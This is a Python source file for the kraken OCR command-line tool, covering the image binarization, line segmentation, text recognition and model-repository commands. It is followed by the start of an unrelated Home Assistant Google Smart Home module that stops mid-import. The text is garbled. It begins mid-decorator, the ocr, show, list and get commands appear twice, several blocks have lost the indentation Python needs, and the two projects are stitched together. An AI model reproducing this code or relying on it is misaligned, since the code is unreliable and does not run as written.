@click.option('-n', '--reorder/--no-reorder', show_default=True, default=True,
              help='Reorder code points to logical order')
@click.option('--base-dir', show_default=True, default='auto',
              type=click.Choice(['L', 'R', 'auto']), help='Set base text '
              'direction. This should be set to the direction used during the '
              'creation of the training data. If set to `auto` it will be '
              'overridden by any explicit value given in the input files.')
@click.option('-s', '--no-segmentation', default=False, show_default=True, is_flag=True,
              help='Enables non-segmentation mode treating each input image as a whole line.')
@click.option('-d', '--text-direction', default='horizontal-tb',
              show_default=True,
              type=click.Choice(['horizontal-tb', 'vertical-lr', 'vertical-rl']),
              help='Sets principal text direction in serialization output')
@click.option('--threads', default=1, show_default=True, type=click.IntRange(1),
              help='Number of threads to use for OpenMP parallelization.')
def ocr(ctx, model, pad, reorder, base_dir, no_segmentation, text_direction, threads):
    """
    Recognizes text in line images.

    Loads every requested recognition model (per-script mappings produced by
    :func:`_validate_mm`) and returns a partial of :func:`recognizer`
    configured with them.
    """
    from kraken.lib import models

    if ctx.meta['input_format_type'] != 'image' and no_segmentation:
        raise click.BadParameter('no_segmentation mode is incompatible with page/alto inputs')

    # An explicit base direction replaces plain boolean BiDi reordering.
    if reorder and base_dir != 'auto':
        reorder = base_dir

    # first we try to find the model in the absolute path, then ~/.kraken,
    # then LEGACY_MODEL_DIR
    nm = {}  # type: Dict[str, models.TorchSeqRecognizer]
    ign_scripts = model.pop('ignore')
    for k, v in model.items():
        search = [v,
                  os.path.join(click.get_app_dir(APP_NAME), v),
                  os.path.join(LEGACY_MODEL_DIR, v)]
        location = None
        for loc in search:
            if os.path.isfile(loc):
                location = loc
                break
        if not location:
            raise click.BadParameter(f'No model for {k} found')
        message(f'Loading ANN {k}\t', nl=False)
        try:
            rnn = models.load_any(location, device=ctx.meta['device'])
            nm[k] = rnn
        except Exception:
            message('\u2717', fg='red')
            ctx.exit(1)
        message('\u2713', fg='green')

    # Fall back to the catch-all model for scripts without a mapping.
    if 'default' in nm:
        from collections import defaultdict
        nn = defaultdict(lambda: nm['default'])  # type: Dict[str, models.TorchSeqRecognizer]
        nn.update(nm)
        nm = nn

    # thread count is global so setting it once is sufficient
    # BUG FIX: the original indexed `nm[k]`, relying on the model-loading
    # loop variable; with an empty mapping (all scripts ignored) that raised
    # a NameError. Use any loaded model instead.
    if nm:
        next(iter(nm.values())).nn.set_num_threads(threads)

    # set output mode
    ctx.meta['text_direction'] = text_direction
    return partial(recognizer,
                   model=nm,
                   pad=pad,
                   no_segmentation=no_segmentation,
                   bidi_reordering=reorder,
                   script_ignore=ign_scripts)
@cli.command('show')
@click.pass_context
@click.argument('model_id')
def show(ctx, model_id):
    """
    Retrieves model metadata from the repository.

    Prints name, summary, description, scripts, alphabet, accuracy, license,
    authors, and publication date of `model_id`, then exits.
    """
    from kraken import repo
    from kraken.lib.util import make_printable, is_printable
    desc = repo.get_description(model_id)
    chars = []
    combining = []
    # Split the alphabet into directly printable characters and
    # combining/unprintable ones shown via their printable representation.
    for char in sorted(desc['graphemes']):
        if not is_printable(char):
            combining.append(make_printable(char))
        else:
            chars.append(char)
    message(
        'name: {}\n\n{}\n\n{}\nscripts: {}\nalphabet: {} {}\naccuracy: {:.2f}%\nlicense: {}\nauthor(s): {}\ndate: {}'.format(
            model_id, desc['summary'], desc['description'], ' '.join(
                desc['script']), ''.join(chars), ', '.join(combining), desc['accuracy'], desc['license']['id'], '; '.join(
                x['name'] for x in desc['creators']), desc['publication_date']))
    ctx.exit(0)
@cli.command('list')
@click.pass_context
def list_models(ctx):
    """
    Lists models in the repository.

    Prints one line per model: id, type(s), and summary.
    """
    from kraken import repo
    message('Retrieving model list ', nl=False)
    # Progress is indicated by printing one dot per repository request.
    model_list = repo.get_listing(partial(message, '.', nl=False))
    message('\b\u2713', fg='green', nl=False)
    # ANSI sequence re-enabling the cursor hidden by the progress display.
    message('\033[?25h\n', nl=False)
    for id, metadata in model_list.items():
        message('{} ({}) - {}'.format(id, ', '.join(metadata['type']), metadata['summary']))
    ctx.exit(0)
@cli.command('get')
@click.pass_context
@click.argument('model_id')
def get(ctx, model_id):
    """
    Retrieves a model from the repository.

    Downloads `model_id` into the application directory and reports the
    resulting file name.
    """
    from kraken import repo
    try:
        os.makedirs(click.get_app_dir(APP_NAME))
    except OSError:
        # Directory already exists (or is unusable); a real problem will
        # surface in the download below.
        pass
    message('Retrieving model ', nl=False)
    filename = repo.get_model(model_id, click.get_app_dir(APP_NAME),
                              partial(message, '.', nl=False))
    message('\b\u2713', fg='green', nl=False)
    message('\033[?25h')
    # BUG FIX: the f-string contained a '(unknown)' placeholder and never
    # reported the downloaded file; `filename` was computed but unused.
    message(f'Model name: {filename}')
    ctx.exit(0)
if __name__ == '__main__':
cli()
# -*- coding: utf-8 -*-
#
# Copyright 2015 Benjamin Kiessling
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
# or implied. See the License for the specific language governing
# permissions and limitations under the License.
"""
kraken.kraken
~~~~~~~~~~~~~
Command line drivers for recognition functionality.
"""
import os
import warnings
import logging
import pkg_resources
from typing import Dict, Union, List, cast, Any, IO, Callable
from functools import partial
from PIL import Image
import click
from kraken.lib import log
warnings.simplefilter('ignore', UserWarning)
logging.captureWarnings(True)
logger = logging.getLogger('kraken')
APP_NAME = 'kraken'
SEGMENTATION_DEFAULT_MODEL = pkg_resources.resource_filename(__name__, 'blla.mlmodel')
DEFAULT_MODEL = ['en-default.mlmodel']
LEGACY_MODEL_DIR = '/usr/local/share/ocropus'
# raise default max image size to 20k * 20k pixels
Image.MAX_IMAGE_PIXELS = 20000 ** 2
def message(msg: str, **styles) -> None:
    """
    Print `msg` via click unless verbose logging is active.

    Output is suppressed once the logger level drops below WARNING (30),
    i.e. when `-v` was given and the log handler reports progress instead.
    """
    if logger.getEffectiveLevel() >= 30:
        click.secho(msg, **styles)
def get_input_parser(type_str: str) -> Callable[[str], Dict[str, Any]]:
    """
    Map an input format name to the matching parser callable.

    Args:
        type_str: One of 'alto', 'page', 'xml', or 'image'.

    Returns:
        A callable taking a file path and returning the parsed document
        (for the XML formats) or a PIL image (for 'image').

    Raises:
        ValueError: If `type_str` is not a known input format. Previously an
            unknown value silently returned ``None``, deferring the failure
            to the call site.
    """
    if type_str == 'alto':
        from kraken.lib.xml import parse_alto
        return parse_alto
    elif type_str == 'page':
        from kraken.lib.xml import parse_page
        return parse_page
    elif type_str == 'xml':
        from kraken.lib.xml import parse_xml
        return parse_xml
    elif type_str == 'image':
        return Image.open
    raise ValueError(f'Unknown input format type {type_str}')
# chainable functions of functional components (binarization/segmentation/recognition)
def binarizer(threshold, zoom, escale, border, perc, range, low, high, input, output) -> None:
    """
    Binarize a single image with kraken's nlbin algorithm.

    Must be the first step of a pipeline; reads `input`, writes the binarized
    image (or, for XML output modes on the last step, a serialized empty
    document referencing it) to `output`.
    """
    from kraken import binarization

    ctx = click.get_current_context()
    if ctx.meta['first_process']:
        if ctx.meta['input_format_type'] != 'image':
            # XML inputs carry the path of the underlying source image.
            input = get_input_parser(ctx.meta['input_format_type'])(input)['image']
        ctx.meta['first_process'] = False
    else:
        raise click.UsageError('Binarization has to be the initial process.')
    try:
        im = Image.open(input)
    except IOError as e:
        raise click.BadParameter(str(e))
    message('Binarizing\t', nl=False)
    try:
        res = binarization.nlbin(im, threshold, zoom, escale, border, perc, range,
                                 low, high)
        if ctx.meta['last_process'] and ctx.meta['output_mode'] != 'native':
            # Last step with an XML serializer: save the image next to the
            # output file and serialize an empty document referencing it.
            with click.open_file(output, 'w', encoding='utf-8') as fp:
                fp = cast(IO[Any], fp)
                logger.info('Serializing as {} into {}'.format(ctx.meta['output_mode'], output))
                res.save(f'{output}.png')
                from kraken import serialization
                fp.write(serialization.serialize([],
                                                 image_name=f'{output}.png',
                                                 image_size=res.size,
                                                 template=ctx.meta['output_mode']))
        else:
            form = None
            ext = os.path.splitext(output)[1]
            # 1bpp output cannot be stored as JPEG; force PNG (also used for
            # extension-less temporary files).
            if ext in ['.jpg', '.jpeg', '.JPG', '.JPEG', '']:
                form = 'png'
                if ext:
                    logger.warning('jpeg does not support 1bpp images. Forcing to png.')
            res.save(output, format=form)
            # Downstream steps read the binarized image as their base image.
            ctx.meta['base_image'] = output
    except Exception:
        message('\u2717', fg='red')
        raise
    message('\u2713', fg='green')
def segmenter(legacy, model, text_direction, scale, maxcolseps, black_colseps,
              remove_hlines, pad, mask, device, input, output) -> None:
    """
    Segment a page image into text lines.

    Runs either the legacy box segmenter (`legacy` truthy) or the neural
    baseline segmenter, writing the result to `output` as JSON or, on the
    last step with an XML serializer, as a serialized document.
    """
    import json
    from kraken import pageseg
    from kraken import blla

    ctx = click.get_current_context()
    if ctx.meta['first_process']:
        if ctx.meta['input_format_type'] != 'image':
            # XML inputs carry the path of the underlying source image.
            input = get_input_parser(ctx.meta['input_format_type'])(input)['image']
        ctx.meta['first_process'] = False
    if 'base_image' not in ctx.meta:
        ctx.meta['base_image'] = input
    try:
        im = Image.open(input)
    except IOError as e:
        raise click.BadParameter(str(e))
    if mask:
        try:
            mask = Image.open(mask)
        except IOError as e:
            raise click.BadParameter(str(e))
    message('Segmenting\t', nl=False)
    try:
        if legacy:
            res = pageseg.segment(im,
                                  text_direction,
                                  scale,
                                  maxcolseps,
                                  black_colseps,
                                  no_hlines=remove_hlines,
                                  pad=pad,
                                  mask=mask)
        else:
            res = blla.segment(im, text_direction, mask=mask, model=model, device=device)
    except Exception:
        message('\u2717', fg='red')
        raise
    if ctx.meta['last_process'] and ctx.meta['output_mode'] != 'native':
        with click.open_file(output, 'w', encoding='utf-8') as fp:
            fp = cast(IO[Any], fp)
            logger.info('Serializing as {} into {}'.format(ctx.meta['output_mode'], output))
            from kraken import serialization
            from kraken.rpred import ocr_record
            # Wrap bare segmentation results in empty ocr_records so the
            # serializer can emit them without recognition output.
            if 'type' in res and res['type'] == 'baselines':
                records = [ocr_record('', '', '', bl) for bl in res['lines']]
            else:
                records = []
                for line in res['boxes']:
                    # Convert the flat box coordinates to a polygon.
                    xmin, xmax = min(line[::2]), max(line[::2])
                    ymin, ymax = min(line[1::2]), max(line[1::2])
                    records.append(ocr_record('', [], [], [[xmin, ymin], [xmin, ymax], [xmax, ymax], [xmax, ymin]]))
            fp.write(serialization.serialize(records,
                                             image_name=ctx.meta['base_image'],
                                             image_size=im.size,
                                             regions=res['regions'] if 'regions' in res else None,
                                             template=ctx.meta['output_mode']))
    else:
        # Intermediate (or native) output: plain JSON segmentation.
        with click.open_file(output, 'w') as fp:
            fp = cast(IO[Any], fp)
            json.dump(res, fp)
    message('\u2713', fg='green')
def recognizer(model, pad, no_segmentation, bidi_reordering, script_ignore, input, output) -> None:
    """
    Run text recognition over a segmented page.

    `input` is either an XML document, a JSON segmentation produced by a
    previous `segment` step, or (with `no_segmentation`) a bare line image.
    Results are written to `output` in the configured serialization mode.
    """
    import json
    from kraken import rpred

    ctx = click.get_current_context()
    bounds = None
    if 'base_image' not in ctx.meta:
        ctx.meta['base_image'] = input
    if ctx.meta['first_process']:
        if ctx.meta['input_format_type'] != 'image':
            # XML input: the parsed document provides image path, lines, and
            # optionally a base direction for BiDi reordering.
            doc = get_input_parser(ctx.meta['input_format_type'])(input)
            ctx.meta['base_image'] = doc['image']
            doc['text_direction'] = 'horizontal-lr'
            if doc['base_dir'] and bidi_reordering is True:
                message(f'Setting base text direction for BiDi reordering to {doc["base_dir"]} (from XML input file)')
                bidi_reordering = doc['base_dir']
            bounds = doc
    try:
        im = Image.open(ctx.meta['base_image'])
    except IOError as e:
        raise click.BadParameter(str(e))
    if not bounds and ctx.meta['base_image'] != input:
        # `input` is a JSON segmentation from a previous pipeline step.
        with click.open_file(input, 'r') as fp:
            try:
                fp = cast(IO[Any], fp)
                bounds = json.load(fp)
            except ValueError as e:
                raise click.UsageError(f'{input} invalid segmentation: {str(e)}')
    elif not bounds:
        if no_segmentation:
            # Treat the whole image as a single text line.
            bounds = {'script_detection': False,
                      'text_direction': 'horizontal-lr',
                      'boxes': [(0, 0) + im.size]}
        else:
            raise click.UsageError('No line segmentation given. Add one with the input or run `segment` first.')
    elif no_segmentation:
        logger.warning('no_segmentation mode enabled but segmentation defined. Ignoring --no-segmentation option.')
    scripts = set()
    # script detection
    if 'script_detection' in bounds and bounds['script_detection']:
        it = rpred.mm_rpred(model, im, bounds, pad,
                            bidi_reordering=bidi_reordering,
                            script_ignore=script_ignore)
    else:
        it = rpred.rpred(model['default'], im, bounds, pad,
                         bidi_reordering=bidi_reordering)
    preds = []
    with log.progressbar(it, label='Processing') as bar:
        for pred in bar:
            preds.append(pred)
    ctx = click.get_current_context()
    with click.open_file(output, 'w', encoding='utf-8') as fp:
        fp = cast(IO[Any], fp)
        message(f'Writing recognition results for {ctx.meta["orig_file"]}\t', nl=False)
        logger.info('Serializing as {} into {}'.format(ctx.meta['output_mode'], output))
        if ctx.meta['output_mode'] != 'native':
            from kraken import serialization
            fp.write(serialization.serialize(preds, ctx.meta['base_image'],
                                             Image.open(ctx.meta['base_image']).size,
                                             ctx.meta['text_direction'],
                                             scripts,
                                             bounds['regions'] if 'regions' in bounds else None,
                                             ctx.meta['output_mode']))
        else:
            # Native mode: one plain-text prediction per line.
            fp.write('\n'.join(s.prediction for s in preds))
    message('\u2713', fg='green')
@click.group(chain=True)
@click.version_option()
@click.option('-i', '--input',
              type=(click.Path(exists=True),  # type: ignore
                    click.Path(writable=True)),
              multiple=True,
              help='Input-output file pairs. Each input file (first argument) is mapped to one '
                   'output file (second argument), e.g. `-i input.png output.txt`')
@click.option('-I', '--batch-input', multiple=True, help='Glob expression to add multiple files at once.')
@click.option('-o', '--suffix', default='', show_default=True,
              help='Suffix for output files from batch and PDF inputs.')
@click.option('-v', '--verbose', default=0, count=True, show_default=True)
@click.option('-f', '--format-type', type=click.Choice(['image', 'alto', 'page', 'pdf', 'xml']), default='image',
              help='Sets the default input type. In image mode inputs are image '
                   'files, alto/page expects XML files in the respective format, pdf '
                   'expects PDF files with numbered suffixes added to output file '
                   'names as needed.')
@click.option('-p', '--pdf-format', default='{src}_{idx:06d}',
              show_default=True,
              help='Format for output of PDF files. valid fields '
                   'are `src` (source file), `idx` (page number), and `uuid` (v4 uuid). '
                   '`-o` suffixes are appended to this format string.')
@click.option('-h', '--hocr', 'serializer',
              help='Switch between hOCR, ALTO, abbyyXML, PageXML or "native" '
                   'output. Native are plain image files for image, JSON for '
                   'segmentation, and text for transcription output.',
              flag_value='hocr')
@click.option('-a', '--alto', 'serializer', flag_value='alto')
@click.option('-y', '--abbyy', 'serializer', flag_value='abbyyxml')
@click.option('-x', '--pagexml', 'serializer', flag_value='pagexml')
@click.option('-n', '--native', 'serializer', flag_value='native', default=True,
              show_default=True)
@click.option('-d', '--device', default='cpu', show_default=True,
              help='Select device to use (cpu, cuda:0, cuda:1, ...)')
@click.option('-r', '--raise-on-error/--no-raise-on-error', default=False, show_default=True,
              help='Raises the exception that caused processing to fail in the case of an error')
def cli(input, batch_input, suffix, verbose, format_type, pdf_format, serializer, device, raise_on_error):
    """
    Base command for recognition functionality.

    Inputs are defined as one or more pairs `-i input_file output_file`
    followed by one or more chainable processing commands. Likewise, verbosity
    is set on all subcommands with the `-v` switch.
    """
    ctx = click.get_current_context()
    ctx.meta['device'] = device
    # PDF pages are rasterized to images before processing, so downstream
    # commands always see image input.
    ctx.meta['input_format_type'] = format_type if format_type != 'pdf' else 'image'
    ctx.meta['raise_failed'] = raise_on_error
    ctx.meta['output_mode'] = serializer
    # Each -v lowers the log level by 10, starting from WARNING (30),
    # capped at DEBUG (10).
    log.set_logger(logger, level=30 - min(10 * verbose, 20))
@cli.resultcallback()
def process_pipeline(subcommands, input, batch_input, suffix, verbose, format_type, pdf_format, **args):
    """
    Helper function calling the partials returned by each subcommand and
    placing their respective outputs in temporary files.

    Args:
        subcommands: Partials returned by the chained subcommands; each is
            called as ``task(input=..., output=...)``.
        input: Sequence of ``(input_file, output_file)`` pairs from ``-i``.
        batch_input: Glob expressions from ``-I``, expanded into `input`.
        suffix: Output suffix (``-o``) appended to batch and PDF outputs.
        verbose: Verbosity counter (consumed by `cli`, unused here).
        format_type: Input type; ``pdf`` triggers page extraction below.
        pdf_format: Format string naming extracted PDF pages (fields:
            ``src``, ``idx``, ``uuid``).
    """
    import glob
    import uuid
    import tempfile

    input = list(input)
    # expand batch inputs
    if batch_input and suffix:
        for batch_expr in batch_input:
            for in_file in glob.glob(batch_expr, recursive=True):
                input.append((in_file, '{}{}'.format(os.path.splitext(in_file)[0], suffix)))
    # parse pdfs: rasterize every page to a temporary PNG and substitute the
    # PNG paths for the original inputs.
    if format_type == 'pdf':
        import pyvips
        if not batch_input:
            logger.warning('PDF inputs not added with batch option. Manual output filename will be ignored and `-o` utilized.')
        new_input = []
        num_pages = 0
        # First pass only counts pages so the progress bar has a length.
        for (fpath, _) in input:
            doc = pyvips.Image.new_from_file(fpath, dpi=300, n=-1, access="sequential")
            if 'n-pages' in doc.get_fields():
                num_pages += doc.get('n-pages')
        with log.progressbar(length=num_pages, label='Extracting PDF pages') as bar:
            for (fpath, _) in input:
                try:
                    doc = pyvips.Image.new_from_file(fpath, dpi=300, n=-1, access="sequential")
                    if 'n-pages' not in doc.get_fields():
                        # BUG FIX: the f-prefix was missing, so the literal
                        # text '{fpath}' was logged.
                        logger.warning(f'{fpath} does not contain pages. Skipping.')
                        continue
                    n_pages = doc.get('n-pages')
                    dest_dict = {'idx': -1, 'src': fpath, 'uuid': None}
                    for i in range(0, n_pages):
                        dest_dict['idx'] += 1
                        dest_dict['uuid'] = str(uuid.uuid4())
                        fd, filename = tempfile.mkstemp(suffix='.png')
                        os.close(fd)
                        doc = pyvips.Image.new_from_file(fpath, dpi=300, page=i, access="sequential")
                        # BUG FIX: the destination file name was replaced by
                        # a '(unknown)' placeholder in the log message.
                        logger.info(f'Saving temporary image {fpath}:{dest_dict["idx"]} to {filename}')
                        doc.write_to_file(filename)
                        new_input.append((filename, pdf_format.format(**dest_dict) + suffix))
                        bar.update(1)
                except pyvips.error.Error:
                    logger.warning(f'{fpath} is not a PDF file. Skipping.')
        input = new_input

    ctx = click.get_current_context()
    for io_pair in input:
        ctx.meta['first_process'] = True
        ctx.meta['last_process'] = False
        ctx.meta['orig_file'] = io_pair[0]
        if 'base_image' in ctx.meta:
            del ctx.meta['base_image']
        # BUG FIX: `fc` is referenced in the finally clause; initialize it so
        # a failure during tempfile creation cannot raise a NameError there.
        fc = []
        try:
            tmps = [tempfile.mkstemp() for _ in subcommands[1:]]
            for tmp in tmps:
                os.close(tmp[0])
            # Chain the subcommands through temporary files:
            # input -> tmp1 -> tmp2 -> ... -> output.
            fc = [io_pair[0]] + [tmp[1] for tmp in tmps] + [io_pair[1]]
            for idx, (task, input, output) in enumerate(zip(subcommands, fc, fc[1:])):
                if len(fc) - 2 == idx:
                    ctx.meta['last_process'] = True
                task(input=input, output=output)
        except Exception as e:
            logger.error(f'Failed processing {io_pair[0]}: {str(e)}')
            if ctx.meta['raise_failed'] is True:
                raise
        finally:
            for f in fc[1:-1]:
                os.unlink(f)
            # clean up temporary PDF image files
            if format_type == 'pdf' and fc:
                logger.debug(f'unlinking {fc[0]}')
                os.unlink(fc[0])
@cli.command('binarize')
@click.option('--threshold', show_default=True, default=0.5, type=click.FLOAT)
@click.option('--zoom', show_default=True, default=0.5, type=click.FLOAT)
@click.option('--escale', show_default=True, default=1.0, type=click.FLOAT)
@click.option('--border', show_default=True, default=0.1, type=click.FLOAT)
@click.option('--perc', show_default=True, default=80, type=click.IntRange(1, 100))
@click.option('--range', show_default=True, default=20, type=click.INT)
@click.option('--low', show_default=True, default=5, type=click.IntRange(1, 100))
@click.option('--high', show_default=True, default=90, type=click.IntRange(1, 100))
def binarize(threshold, zoom, escale, border, perc, range, low, high):
    """
    Binarizes page images.

    Returns a partial of :func:`binarizer` carrying the nlbin parameters;
    the pipeline driver later supplies the ``input``/``output`` paths.
    """
    return partial(binarizer, threshold, zoom, escale, border, perc, range, low, high)
@cli.command('segment')
@click.pass_context
@click.option('-i', '--model',
              default=None,
              show_default=True, type=click.Path(exists=True),
              help='Baseline detection model to use')
@click.option('-x/-bl', '--boxes/--baseline', default=True, show_default=True,
              help='Switch between legacy box segmenter and neural baseline segmenter')
@click.option('-d', '--text-direction', default='horizontal-lr',
              show_default=True,
              type=click.Choice(['horizontal-lr', 'horizontal-rl',
                                 'vertical-lr', 'vertical-rl']),
              help='Sets principal text direction')
@click.option('--scale', show_default=True, default=None, type=click.FLOAT)
@click.option('-m', '--maxcolseps', show_default=True, default=2, type=click.INT)
@click.option('-b/-w', '--black-colseps/--white_colseps', show_default=True, default=False)
@click.option('-r/-l', '--remove_hlines/--hlines', show_default=True, default=True)
@click.option('-p', '--pad', show_default=True, type=(int, int), default=(0, 0),
              help='Left and right padding around lines')
# NOTE(review): '-m' is also used by --maxcolseps above — duplicated short
# option; confirm which declaration is intended to win at parse time.
@click.option('-m', '--mask', show_default=True, default=None,
              type=click.File(mode='rb', lazy=True), help='Segmentation mask '
              'suppressing page areas for line detection. 0-valued image '
              'regions are ignored for segmentation purposes. Disables column '
              'detection.')
def segment(ctx, model, boxes, text_direction, scale, maxcolseps,
            black_colseps, remove_hlines, pad, mask):
    """
    Segments page images into text lines.

    Returns a partial of :func:`segmenter` configured with either the legacy
    box segmenter or (when ``-bl`` is given or a model forces it) the neural
    baseline segmenter.
    """
    # A baseline model is meaningless for the legacy segmenter; force -bl.
    if model and boxes:
        logger.warning(f'Baseline model ({model}) given but legacy segmenter selected. Forcing to -bl.')
        boxes = False
    if boxes is False:
        if not model:
            model = SEGMENTATION_DEFAULT_MODEL
        from kraken.lib.vgsl import TorchVGSLModel
        message(f'Loading ANN {model}\t', nl=False)
        try:
            # `model` is rebound from a path to the loaded TorchVGSLModel.
            model = TorchVGSLModel.load_model(model)
            model.to(ctx.meta['device'])
        except Exception:
            message('\u2717', fg='red')
            ctx.exit(1)
        message('\u2713', fg='green')
    return partial(segmenter, boxes, model, text_direction, scale, maxcolseps,
                   black_colseps, remove_hlines, pad, mask,
                   ctx.meta['device'])
def _validate_mm(ctx, param, value):
"""
Maps model mappings to a dictionary.
"""
model_dict = {'ignore': []} # type: Dict[str, Union[str, List[str]]]
if len(value) == 1 and len(value[0].split(':')) == 1:
model_dict['default'] = value[0]
return model_dict
try:
for m in value:
k, v = m.split(':')
if v == 'ignore':
model_dict['ignore'].append(k) # type: ignore
else:
model_dict[k] = os.path.expanduser(v)
except Exception:
raise click.BadParameter('Mappings must be in format script:model')
return model_dict
@cli.command('ocr')
@click.pass_context
@click.option('-m', '--model', default=DEFAULT_MODEL, multiple=True,
              show_default=True, callback=_validate_mm,
              help='Path to an recognition model or mapping of the form '
              '$script1:$model1. Add multiple mappings to run multi-model '
              'recognition based on detected scripts. Use the default keyword '
              'for adding a catch-all model. Recognition on scripts can be '
              'ignored with the model value ignore.')
@click.option('-p', '--pad', show_default=True, type=click.INT, default=16, help='Left and right '
              'padding around lines')
@click.option('-n', '--reorder/--no-reorder', show_default=True, default=True,
              help='Reorder code points to logical order')
@click.option('--base-dir', show_default=True, default='auto',
              type=click.Choice(['L', 'R', 'auto']), help='Set base text '
              'direction. This should be set to the direction used during the '
              'creation of the training data. If set to `auto` it will be '
              'overridden by any explicit value given in the input files.')
@click.option('-s', '--no-segmentation', default=False, show_default=True, is_flag=True,
              help='Enables non-segmentation mode treating each input image as a whole line.')
@click.option('-d', '--text-direction', default='horizontal-tb',
              show_default=True,
              type=click.Choice(['horizontal-tb', 'vertical-lr', 'vertical-rl']),
              help='Sets principal text direction in serialization output')
@click.option('--threads', default=1, show_default=True, type=click.IntRange(1),
              help='Number of threads to use for OpenMP parallelization.')
def ocr(ctx, model, pad, reorder, base_dir, no_segmentation, text_direction, threads):
    """
    Recognizes text in line images.

    Loads every requested recognition model (per-script mappings produced by
    :func:`_validate_mm`) and returns a partial of :func:`recognizer`
    configured with them.
    """
    from kraken.lib import models

    if ctx.meta['input_format_type'] != 'image' and no_segmentation:
        raise click.BadParameter('no_segmentation mode is incompatible with page/alto inputs')

    # An explicit base direction replaces plain boolean BiDi reordering.
    if reorder and base_dir != 'auto':
        reorder = base_dir

    # first we try to find the model in the absolute path, then ~/.kraken,
    # then LEGACY_MODEL_DIR
    nm = {}  # type: Dict[str, models.TorchSeqRecognizer]
    ign_scripts = model.pop('ignore')
    for k, v in model.items():
        search = [v,
                  os.path.join(click.get_app_dir(APP_NAME), v),
                  os.path.join(LEGACY_MODEL_DIR, v)]
        location = None
        for loc in search:
            if os.path.isfile(loc):
                location = loc
                break
        if not location:
            raise click.BadParameter(f'No model for {k} found')
        message(f'Loading ANN {k}\t', nl=False)
        try:
            rnn = models.load_any(location, device=ctx.meta['device'])
            nm[k] = rnn
        except Exception:
            message('\u2717', fg='red')
            ctx.exit(1)
        message('\u2713', fg='green')

    # Fall back to the catch-all model for scripts without a mapping.
    if 'default' in nm:
        from collections import defaultdict
        nn = defaultdict(lambda: nm['default'])  # type: Dict[str, models.TorchSeqRecognizer]
        nn.update(nm)
        nm = nn

    # thread count is global so setting it once is sufficient
    # BUG FIX: the original indexed `nm[k]`, relying on the model-loading
    # loop variable; with an empty mapping (all scripts ignored) that raised
    # a NameError. Use any loaded model instead.
    if nm:
        next(iter(nm.values())).nn.set_num_threads(threads)

    # set output mode
    ctx.meta['text_direction'] = text_direction
    return partial(recognizer,
                   model=nm,
                   pad=pad,
                   no_segmentation=no_segmentation,
                   bidi_reordering=reorder,
                   script_ignore=ign_scripts)
@cli.command('show')
@click.pass_context
@click.argument('model_id')
def show(ctx, model_id):
    """
    Retrieves model metadata from the repository.

    Prints name, summary, description, scripts, alphabet, accuracy, license,
    authors, and publication date of `model_id`, then exits.
    """
    from kraken import repo
    from kraken.lib.util import make_printable, is_printable
    desc = repo.get_description(model_id)
    chars = []
    combining = []
    # Split the alphabet into directly printable characters and
    # combining/unprintable ones shown via their printable representation.
    for char in sorted(desc['graphemes']):
        if not is_printable(char):
            combining.append(make_printable(char))
        else:
            chars.append(char)
    message(
        'name: {}\n\n{}\n\n{}\nscripts: {}\nalphabet: {} {}\naccuracy: {:.2f}%\nlicense: {}\nauthor(s): {}\ndate: {}'.format(
            model_id, desc['summary'], desc['description'], ' '.join(
                desc['script']), ''.join(chars), ', '.join(combining), desc['accuracy'], desc['license']['id'], '; '.join(
                x['name'] for x in desc['creators']), desc['publication_date']))
    ctx.exit(0)
@cli.command('list')
@click.pass_context
def list_models(ctx):
    """
    Lists models in the repository.

    Prints one line per model: id, type(s), and summary.
    """
    from kraken import repo
    message('Retrieving model list ', nl=False)
    # Progress is indicated by printing one dot per repository request.
    model_list = repo.get_listing(partial(message, '.', nl=False))
    message('\b\u2713', fg='green', nl=False)
    # ANSI sequence re-enabling the cursor hidden by the progress display.
    message('\033[?25h\n', nl=False)
    for id, metadata in model_list.items():
        message('{} ({}) - {}'.format(id, ', '.join(metadata['type']), metadata['summary']))
    ctx.exit(0)
@cli.command('get')
@click.pass_context
@click.argument('model_id')
def get(ctx, model_id):
    """
    Retrieves a model from the repository.

    Downloads `model_id` into the application directory and reports the
    resulting file name.
    """
    from kraken import repo
    try:
        os.makedirs(click.get_app_dir(APP_NAME))
    except OSError:
        # Directory already exists (or is unusable); a real problem will
        # surface in the download below.
        pass
    message('Retrieving model ', nl=False)
    filename = repo.get_model(model_id, click.get_app_dir(APP_NAME),
                              partial(message, '.', nl=False))
    message('\b\u2713', fg='green', nl=False)
    message('\033[?25h')
    # BUG FIX: the f-string contained a '(unknown)' placeholder and never
    # reported the downloaded file; `filename` was computed but unused.
    message(f'Model name: {filename}')
    ctx.exit(0)
if __name__ == '__main__':
cli()
|
"""Implement the Google Smart Home traits."""
from __future__ import annotations
import logging
from homeassistant.components import (
alarm_control_panel,
binary_sensor,
camera,
cover,
fan,
group,
input_boolean,
input_select,
light,
lock,
media_player,
scene,
script,
select,
sensor,
switch,
vacuum,
)
from homeassistant.components.climate import const as climate
from homeassistant.components.humidifier import const as humidifier
from homeassistant.components.lock import STATE_JAMMED, STATE_UNLOCKING
from homeassistant.components.media_player.const import MEDIA_TYPE_CHANNEL
from homeassistant.const import (
ATTR_ASSUMED_STATE,
ATTR_BATTERY_LEVEL,
ATTR_CODE,
ATTR_DEVICE_CLASS,
ATTR_ENTITY_ID,
ATTR_MODE,
ATTR_SUPPORTED_FEATURES,
ATTR_TEMPERATURE,
CAST_APP_ID_HOMEASSISTANT,
SERVICE_ALARM_ARM_AWAY,
SERVICE_ALARM_ARM_CUSTOM_BYPASS,
SERVICE_ALARM_ARM_HOME,
SERVICE_ALARM_ARM_NIGHT,
SERVICE_ALARM_DISARM,
SERVICE_ALARM_TRIGGER,
SERVICE_TURN_OFF,
SERVICE_TURN_ON,
STATE_ALARM_ARMED_AWAY,
STATE_ALARM_ARMED_CUSTOM_BYPASS,
STATE_ALARM_ARMED_HOME,
STATE_ALARM_ARMED_NIGHT,
STATE_ALARM_DISARMED,
STATE_ALARM_PENDING,
STATE_ALARM_TRIGGERED,
STATE_IDLE,
STATE_LOCKED,
STATE_OFF,
STATE_ON,
STATE_PAUSED,
STATE_PLAYING,
STATE_STANDBY,
STATE_UNAVAILABLE,
STATE_UNKNOWN,
TEMP_CELSIUS,
TEMP_FAHRENHEIT,
)
from homeassistant.core import DOMAIN as HA_DOMAIN
from homeassistant.helpers.network import get_url
from homeassistant.util import color as color_util, dt, temperature as temp_util
from .const import (
